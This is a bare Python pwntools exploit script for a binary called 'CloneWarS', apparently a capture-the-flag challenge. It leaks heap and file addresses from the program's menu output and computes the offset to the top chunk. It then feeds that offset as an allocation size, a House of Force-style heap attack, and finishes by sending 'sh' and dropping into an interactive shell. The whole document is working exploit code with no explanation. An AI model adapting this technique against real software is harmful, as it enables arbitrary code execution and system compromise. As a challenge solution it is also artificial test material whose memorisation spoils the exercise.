# coding: utf-8
from pwn import *
import time

def starships(size, kind, capacity):
    #print(p.recv())
    time.sleep(1)
    p.sendline("3")
    p.sendline(str(size))
    p.sendline(kind)
    p.sendline(str(capacity))

binary = "./CloneWarS"
elf=ELF(binary)
p=process(binary)
context.arch="amd64"
print(p.recv())
time.sleep(1)
starships(0x30, 'A', 0x30)
time.sleep(1)
#print(p.recv())
p.sendline("2")
resp = p.recv()
print(resp)
p.sendline("2")
p.recvuntil('R2D2 IS .... ')
HEAP_L = int(p.recvregex(r'(\d+) '))
log.info('HEAP ADDR 0x%x'% HEAP_L)
starships(0x30, "FF", 0x40)
time.sleep(1)
p.sendline("6")
time.sleep(1)
p.recvuntil('File is at: ')
FILE = int(p.recvline().rstrip())
log.info("FILE ADDR 0x%x" % FILE)
print(p.recv())
HEAP = HEAP_L-0x1380 # HEAPBASE
SIZE_OF_LONG = 0x8 # sizeof(long) -> 8 in 64 bits
WILD_OFFSET = 0x12e0 # Current TOP_CHUNK offset
TOP_CHUNK = HEAP+WILD_OFFSET+SIZE_OF_LONG*4
p.sendline("1")
print(p.recv())
p.sendline("1")
time.sleep(1)
print(p.recv())
p.sendline(str(FILE-TOP_CHUNK))
p.sendline("4")
p.sendline("sh")
p.sendline("6")
p.interactive()
